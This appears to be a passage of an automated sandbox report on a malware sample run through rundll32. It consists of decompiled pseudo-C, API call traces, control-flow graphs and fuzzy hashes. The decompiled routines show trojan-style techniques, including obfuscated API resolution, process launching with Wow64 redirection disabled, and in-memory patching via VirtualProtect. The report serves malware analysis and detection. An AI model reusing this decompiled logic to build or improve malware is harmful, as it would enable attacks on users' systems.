                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t74;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0xe5a2c4; // 0x2ec
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0xe5a2a4 = 5;
                                                          						} else {
                                                          							_t69 = E00E55335(_t74); // executed
                                                          							if(_t69 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0xe5a2b8 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t72 = _v12;
                                                          						_t58 = _t72 << 4;
                                                          						_t20 =  &_v16; // 0xe54579
                                                          						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                          						_t73 = _t72 + 1;
                                                          						_v24 = _t72 + 1;
                                                          						_t61 = E00E55242( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76, _t20); // executed
                                                          						_v8.LowPart = _t61;
                                                          						if(_t61 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t66 = _v24;
                                                          						_t90 = _t66 - 3;
                                                          						_v12 = _t66;
                                                          						if(_t66 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_t30 =  &_a8; // 0xe54579
                                                          							_t68 = E00E574CB(_t73, _t90,  &_v92, _a4,  *_t30); // executed
                                                          							_v8.LowPart = _t68;
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t61 - 0x10d2;
                                                          						if(_t61 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0xe5a29c);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0xe5a2a0; // 0x1
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t61 = E00E53546();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0xe5a2a0);
                                                          								L21:
                                                          								L00E57DDC();
                                                          								_v36.LowPart = _t61;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								__eflags = _t65;
                                                          								_v8.LowPart = _t65;
                                                          								if(_t65 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t71 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							RtlFreeHeap( *0xe5a290, 0, _t54); // executed
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t71 = _t71 - 1;
                                                          					} while (_t71 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 00E550B8
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00E550C4
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00E550E9
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00E55105
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E5511E
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00E551B3
                                                          • CloseHandle.KERNEL32(?), ref: 00E551C2
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00E551FC
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,yE), ref: 00E55212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E5521D
                                                            • Part of subcall function 00E55335: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051B9318,00000000,?,7519F710,00000000,7519F730), ref: 00E55384
                                                            • Part of subcall function 00E55335: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051B9350,?,00000000,30314549,00000014,004F0053,051B930C), ref: 00E55421
                                                            • Part of subcall function 00E55335: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E55131), ref: 00E55433
                                                          • GetLastError.KERNEL32 ref: 00E5522F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID: yE$yE
                                                          • API String ID: 3521023985-2374382181
                                                          • Opcode ID: 6a99766cd69b2bd5c43b48ab04ee4d387d46106ee616c222848f2dc0e4cf91d8
                                                          • Instruction ID: f94d11a81926200729b4bbb340089b9d7d716052ec064355a00572af74625fae
                                                          • Opcode Fuzzy Hash: 6a99766cd69b2bd5c43b48ab04ee4d387d46106ee616c222848f2dc0e4cf91d8
                                                          • Instruction Fuzzy Hash: 7C519076801A28EECF109F95DD44AEEBFBCEF05326F205A15F915F21A0D7704A48CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 171 5588323-5588336 172 5588388-5588394 171->172 173 5588338-5588342 call 558c26c call 5571794 171->173 175 5588396-55883b5 CloseHandle 172->175 176 55883b7-55883c3 call 5590779 172->176 187 5588348-5588355 SleepEx 173->187 175->176 182 55883d4-55883db 176->182 183 55883c5-55883d2 ReleaseMutex CloseHandle 176->183 185 55883ec-55883f9 SleepEx 182->185 186 55883dd-55883ea ResetEvent CloseHandle 182->186 183->182 185->185 188 55883fb 185->188 186->185 187->187 189 5588357-558835e 187->189 190 5588400-558840d SleepEx 188->190 191 5588360-5588366 189->191 192 5588374-5588386 RtlDeleteCriticalSection * 2 189->192 193 558840f-5588414 190->193 194 5588416-558841d 190->194 191->192 195 5588368-558836f call 557231d 191->195 192->172 193->190 193->194 197 558842d-5588433 194->197 198 558841f-5588427 HeapFree 194->198 195->192 199 558843a-5588445 197->199 200 5588435 call 558047b 197->200 198->197 202 5588456-558845d 199->202 203 5588447-558844e 199->203 200->199 205 558845f-5588460 RtlRemoveVectoredExceptionHandler 202->205 206 5588466-558846c 202->206 203->202 204 5588450-5588452 203->204 204->202 205->206 207 558846e call 5583e58 206->207 208 5588473 206->208 207->208 210 5588478-5588485 SleepEx 208->210 211 558848e-5588495 210->211 212 5588487-558848c 210->212 213 55884ad-55884bd LocalFree 211->213 214 5588497-558849c 211->214 212->210 212->211 214->213 215 558849e 214->215 216 55884a1-55884ab CloseHandle 215->216 216->213 216->216
                                                          APIs
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 0558834C
                                                          • RtlDeleteCriticalSection.NTDLL(0559C2E0), ref: 0558837F
                                                          • RtlDeleteCriticalSection.NTDLL(0559C300), ref: 05588386
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883B5
                                                          • ReleaseMutex.KERNEL32(000003F4,00000000,?,?,?,0558BCB5), ref: 055883C6
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883D2
                                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0558BCB5), ref: 055883DE
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883EA
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 055883F0
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 05588404
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0558BCB5), ref: 05588427
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05588460
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 0558847C
                                                          • CloseHandle.KERNEL32(059B8558,?,?,0558BCB5), ref: 055884A3
                                                          • LocalFree.KERNEL32(?,?,0558BCB5), ref: 055884B3
                                                            • Part of subcall function 0558C26C: GetVersion.KERNEL32(?,00000000,7519F720,?,0558833D,00000000,?,?,?,0558BCB5), ref: 0558C290
                                                            • Part of subcall function 0558C26C: GetModuleHandleA.KERNEL32(?,059B9759,?,0558833D,00000000,?,?,?,0558BCB5), ref: 0558C2AD
                                                            • Part of subcall function 0558C26C: GetProcAddress.KERNEL32(00000000), ref: 0558C2B4
                                                            • Part of subcall function 05571794: RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557179E
                                                            • Part of subcall function 05571794: RtlLeaveCriticalSection.NTDLL(0559C300), ref: 055717DA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                          • String ID:
                                                          • API String ID: 1924086638-0
                                                          • Opcode ID: a24f5aad825e022c21c1ce3dda6e597b8fb14d85891984104d89053962cfb64a
                                                          • Instruction ID: 010805e4bca37e453b745d379e2f3ead5c9a5daec61fc445ed698b9f2128abac
                                                          • Opcode Fuzzy Hash: a24f5aad825e022c21c1ce3dda6e597b8fb14d85891984104d89053962cfb64a
                                                          • Instruction Fuzzy Hash: C9414232650206DBDB20BFA5EC86A797BA5F700354B860467F501B7260CF79AC8CAF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 247 e52f12-e52f35 call e56acc 250 e53047-e5304e 247->250 251 e52f3b-e52f54 call e577ff call 557bcb3 247->251 255 e53035-e53042 call e513cc 251->255 256 e52f5a-e52f61 251->256 255->250 256->255 257 e52f67-e52f9a memset call e54b6b 256->257 262 e52fa0-e52fc4 GetModuleHandleA GetProcAddress 257->262 263 e5302e 257->263 265 e53015 262->265 266 e52fc6-e52feb Wow64EnableWow64FsRedirection 262->266 263->255 267 e5301c-e5302c HeapFree 265->267 272 e52fec call 557ccb6 266->272 273 e52fec call 5583aea 266->273 274 e52fec call 557cc84 266->274 267->255 268 e52fee-e52ff6 Wow64EnableWow64FsRedirection 269 e52ff8-e53008 CloseHandle * 2 268->269 270 e5300a-e53013 GetLastError 268->270 269->267 270->267 272->268 273->268 274->268
                                                          C-Code - Quality: 61%
                                                          			E00E52F12(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t39;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				void* _t52;
                                                          				intOrPtr _t53;
                                                          				void* _t61;
                                                          				intOrPtr* _t66;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t76;
                                                          
                                                          				_t71 =  *((intOrPtr*)(__eax + 0x14));
                                                          				_t39 = E00E56ACC(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16); // executed
                                                          				_v8 = _t39;
                                                          				if(_t39 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E00E577FF( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                                          				_t43 = _v12(_v12);
                                                          				_v8 = _t43;
                                                          				if(_t43 == 0 && ( *0xe5a2b8 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t50 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t18 = _t50 + 0xe5b55b; // 0x73797325
                                                          					_t52 = E00E54B6B(_t18);
                                                          					_v12 = _t52;
                                                          					if(_t52 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t53 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t20 = _t53 + 0xe5b73d; // 0x51b8ce5
                                                          						_t21 = _t53 + 0xe5b0af; // 0x4e52454b
                                                          						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                                          						if(_t66 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_t73 = __imp__;
                                                          							_v108 = 0x44;
                                                          							 *_t73(0);
                                                          							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
                                                          							 *_t73(1);
                                                          							if(_t61 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0xe5a290, 0, _v12);
                                                          					}
                                                          				}
                                                          				_t76 = _v16;
                                                          				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                                          				E00E513CC(_t76);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E56ACC: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E52F2E,?,?,?,?,00000000,00000000), ref: 00E56AF1
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E56B13
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E56B29
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E56B3F
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E56B55
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E56B6B
                                                          • memset.NTDLL ref: 00E52F7C
                                                            • Part of subcall function 00E54B6B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00E52F95,73797325), ref: 00E54B7C
                                                            • Part of subcall function 00E54B6B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00E54B96
                                                          • GetModuleHandleA.KERNEL32(4E52454B,051B8CE5,73797325), ref: 00E52FB3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00E52FBA
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E52FD4
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E52FF2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E53001
                                                          • CloseHandle.KERNEL32(?), ref: 00E53006
                                                          • GetLastError.KERNEL32 ref: 00E5300A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E53026
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                          • String ID: zu
                                                          • API String ID: 91923200-1569895686
                                                          • Opcode ID: 1cc4c65e707246fc26571383b34ad56f318e52eac17880f84204cd6b1a153a80
                                                          • Instruction ID: 607216d99ecb9aac3bf9aee7ed8419a74c5e7d5d6b2f467a8fb9a3dc43a49be4
                                                          • Opcode Fuzzy Hash: 1cc4c65e707246fc26571383b34ad56f318e52eac17880f84204cd6b1a153a80
                                                          • Instruction Fuzzy Hash: D5318971900319EFCB11AFA5DC489DEBFB8EF08352F100861EA05B31A1C7719A48DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 296 5592ec9-5592eea call 5595254 299 5592fca 296->299 300 5592ef0-5592ef1 296->300 301 5592fd0-5592fdf VirtualProtect 299->301 302 5592ef3-5592ef6 300->302 303 5592f56-5592f5d 300->303 306 5592ffc-5593002 GetLastError 301->306 307 5592fe1-5592ff7 VirtualProtect 301->307 308 5592efc 302->308 309 5593021-559302d call 559528f 302->309 304 5592f9d-5592fb2 VirtualProtect 303->304 305 5592f5f-5592f65 303->305 304->301 312 5592fb4-5592fc8 304->312 305->304 311 5592f67-5592f73 305->311 306->309 313 5592f02-5592f08 307->313 308->313 311->301 317 5592f75-5592f82 VirtualProtect 311->317 318 5592f99-5592f9b VirtualProtect 312->318 314 5592f4a-5592f51 313->314 315 5592f0a-5592f0e 313->315 314->309 315->314 319 5592f10-5592f2c lstrlen VirtualProtect 315->319 317->301 320 5592f84-5592f98 317->320 318->301 319->314 321 5592f2e-5592f48 lstrcpy VirtualProtect 319->321 320->318 321->314
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F16
                                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F28
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05592F37
                                                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F48
                                                          • VirtualProtect.KERNEL32(?,00000005,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F7E
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F99
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FAE
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FDB
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FF5
                                                          • GetLastError.KERNEL32(?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FFC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3676034644-0
                                                          • Opcode ID: 0da922f4274bee0c13edc2d904b65b3ac7def62db9f81aae872bfedfed388e34
                                                          • Instruction ID: 7b67d05eb212cc9a392878300c429d098953f83034ab94cd2df7e2fb98d80b3f
                                                          • Opcode Fuzzy Hash: 0da922f4274bee0c13edc2d904b65b3ac7def62db9f81aae872bfedfed388e34
                                                          • Instruction Fuzzy Hash: 16414E7590070AEFDF25DFA5CC45EAABBB9FF08310F018519E656A65A0D738E805DF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 322 558ed7b-558edba call 559079b VirtualAlloc 325 558ee8b 322->325 326 558edc0-558edcb call 559079b 322->326 328 558ee93-558ee95 325->328 329 558edd0-558edd6 326->329 330 558eea5-558eeb0 328->330 331 558ee97-558ee9e 328->331 332 558edd8-558eddc 329->332 333 558edfe-558ee00 329->333 331->330 332->333 335 558edde-558edfc VirtualAlloc 332->335 333->325 334 558ee06-558ee0a 333->334 334->325 336 558ee0c-558ee17 334->336 335->326 335->333 336->328 338 558ee19 336->338 339 558ee1f-558ee2c 338->339 340 558ee68-558ee82 339->340 341 558ee2e-558ee37 lstrcmpi 339->341 340->328 343 558ee84-558ee89 340->343 341->340 342 558ee39-558ee44 StrChrA 341->342 344 558ee54-558ee64 342->344 345 558ee46-558ee52 lstrcmpi 342->345 343->328 344->339 346 558ee66 344->346 345->340 345->344 346->328
                                                          APIs
                                                            • Part of subcall function 0559079B: GetProcAddress.KERNEL32(?,00000318), ref: 055907C0
                                                            • Part of subcall function 0559079B: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 055907DC
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDB4
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0558EE9F
                                                            • Part of subcall function 0559079B: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05590946
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0558EDEA
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDF6
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0558EE33
                                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0558EE3C
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0558EE4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                          • String ID: u
                                                          • API String ID: 3901270786-4067256894
                                                          • Opcode ID: 7a0663c640ec0feb06539326eeeae567b12982aef53e874a71004f2a956cdae4
                                                          • Instruction ID: 17d613381c00559e42e8542a8953a1f6aeaeda35bf96502efc114a4ec0858503
                                                          • Opcode Fuzzy Hash: 7a0663c640ec0feb06539326eeeae567b12982aef53e874a71004f2a956cdae4
                                                          • Instruction Fuzzy Hash: 5B316D71509315ABD721EF11C846B2BBBF9FF88B54F010919F985B7280D774E908CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 385 e5435f-e5437a call e569ce 388 e54390-e5439e 385->388 389 e5437c-e5438a 385->389 391 e543b0-e543f7 call e5570a ConvertStringSecurityDescriptorToSecurityDescriptorA call e566ce 388->391 392 e543a0-e543a3 388->392 389->388 400 e54402-e54405 391->400 401 e543f9-e543fc CloseHandle 391->401 392->391 393 e543a5-e543aa 392->393 393->391 395 e5458f 393->395 398 e54591-e54597 395->398 402 e54407-e5440c 400->402 403 e5442e-e5443e 400->403 401->400 404 e54412 402->404 405 e5457b-e5457f 402->405 406 e54487-e544a5 call e51262 call e55fbc 403->406 407 e54440-e54455 call e56cd6 call e55fbc 403->407 411 e54415-e54427 call e5663c 404->411 408 e54587 405->408 409 e54581-e54585 405->409 425 e544a7-e544d0 memset RtlInitializeCriticalSection 406->425 426 e544d2-e544d4 406->426 423 e54457-e5447e wsprintfA 407->423 424 e54481 407->424 416 e5458d 408->416 409->398 409->408 421 e54429 411->421 416->398 421->405 423->424 424->406 427 e544d5-e544d7 425->427 426->427 427->405 428 e544dd-e544f3 RtlAllocateHeap 427->428 429 e544f5-e5451b wsprintfA 428->429 430 e5451d-e5451f 428->430 431 e54520-e54522 429->431 430->431 431->405 432 e54524-e54544 call e56cd6 call e5725f 431->432 432->405 437 e54546-e5454d call e5355c 432->437 440 e54554-e5455b 437->440 441 e5454f-e54552 437->441 442 e54570-e54574 call e550a3 440->442 443 e5455d-e5455f 440->443 441->405 447 e54579 442->447 443->405 444 e54561-e5456e call e52a24 443->444 444->405 444->442 447->405
                                                          C-Code - Quality: 64%
                                                          			E00E5435F(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				signed int _v16;
                                                          				long _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				char _v40;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t27;
                                                          				long _t28;
                                                          				long _t31;
                                                          				intOrPtr _t32;
                                                          				void* _t36;
                                                          				signed int _t37;
                                                          				intOrPtr _t38;
                                                          				void* _t39;
                                                          				CHAR* _t42;
                                                          				long _t48;
                                                          				long _t49;
                                                          				void* _t54;
                                                          				void* _t56;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				long _t71;
                                                          				void* _t72;
                                                          				signed char _t74;
                                                          				intOrPtr _t76;
                                                          				signed int _t77;
                                                          				long _t82;
                                                          				long _t84;
                                                          				CHAR* _t87;
                                                          				void* _t88;
                                                          
                                                          				_t79 = __edx;
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t27 = E00E569CE();
                                                          				if(_t27 != 0) {
                                                          					_t77 =  *0xe5a2b4; // 0x4000000a
                                                          					_t73 = (_t77 & 0xf0000000) + _t27;
                                                          					 *0xe5a2b4 = (_t77 & 0xf0000000) + _t27;
                                                          				}
                                                          				_t28 =  *0xe5a148(0, 2); // executed
                                                          				_v20 = _t28;
                                                          				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                                          					_t31 = E00E5570A( &_v8,  &_v16); // executed
                                                          					_push(0);
                                                          					_t84 = _t31;
                                                          					_t32 =  *0xe5a2d4; // 0x435d5a8
                                                          					_push(0xe5a2fc);
                                                          					_push(1);
                                                          					_t7 = _t32 + 0xe5b5bc; // 0x4d283a53
                                                          					 *0xe5a2f8 = 0xc;
                                                          					 *0xe5a300 = 0;
                                                          					L00E52BFF();
                                                          					_t36 = E00E566CE(_t79,  &_v24,  &_v12); // executed
                                                          					if(_t36 == 0) {
                                                          						CloseHandle(_v24);
                                                          					}
                                                          					if(_t84 != 5) {
                                                          						_t37 = _v16;
                                                          						__eflags = _t37;
                                                          						if(_t37 != 0) {
                                                          							E00E56CD6(_t37 ^ 0xe8fa7dd7,  &_v40);
                                                          							_t87 = E00E55FBC(0x27);
                                                          							__eflags = _t87;
                                                          							if(_t87 != 0) {
                                                          								asm("bswap eax");
                                                          								asm("bswap eax");
                                                          								asm("bswap eax");
                                                          								asm("bswap eax");
                                                          								_t64 =  *0xe5a2d4; // 0x435d5a8
                                                          								_t18 = _t64 + 0xe5b86f; // 0x78383025
                                                          								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                                          								_t88 = _t88 + 0x18;
                                                          							}
                                                          							 *0xe5a32c = _t87;
                                                          						}
                                                          						_t38 = E00E51262();
                                                          						 *0xe5a2c8 =  *0xe5a2c8 ^ 0xe8fa7dd7;
                                                          						 *0xe5a31c = _t38;
                                                          						_t39 = E00E55FBC(0x60);
                                                          						__eflags = _t39;
                                                          						 *0xe5a37c = _t39;
                                                          						if(_t39 == 0) {
                                                          							_t84 = 8;
                                                          						} else {
                                                          							memset(_t39, 0, 0x60);
                                                          							_t54 =  *0xe5a37c; // 0x51b9630
                                                          							_t88 = _t88 + 0xc;
                                                          							__imp__(_t54 + 0x40);
                                                          							_t56 =  *0xe5a37c; // 0x51b9630
                                                          							 *_t56 = 0xe5b85e;
                                                          							_t84 = 0;
                                                          						}
                                                          						__eflags = _t84;
                                                          						if(_t84 == 0) {
                                                          							_t42 = RtlAllocateHeap( *0xe5a290, _t84, 0x52);
                                                          							__eflags = _t42;
                                                          							 *0xe5a314 = _t42;
                                                          							if(_t42 == 0) {
                                                          								_t84 = 8;
                                                          							} else {
                                                          								_t74 =  *0xe5a2b4; // 0x4000000a
                                                          								_t79 = _t74 & 0x000000ff;
                                                          								_t76 =  *0xe5a2d4; // 0x435d5a8
                                                          								_t19 = _t76 + 0xe5b212; // 0x697a6f4d
                                                          								_t73 = _t19;
                                                          								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xe592a7);
                                                          							}
                                                          							__eflags = _t84;
                                                          							if(_t84 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E00E56CD6( ~_v8 &  *0xe5a2c8, 0xe5a00c); // executed
                                                          								_t84 = E00E5725F(_t73);
                                                          								__eflags = _t84;
                                                          								if(_t84 != 0) {
                                                          									goto L31;
                                                          								}
                                                          								_t48 = E00E5355C();
                                                          								__eflags = _t48;
                                                          								if(_t48 != 0) {
                                                          									__eflags = _v8;
                                                          									_t82 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L30:
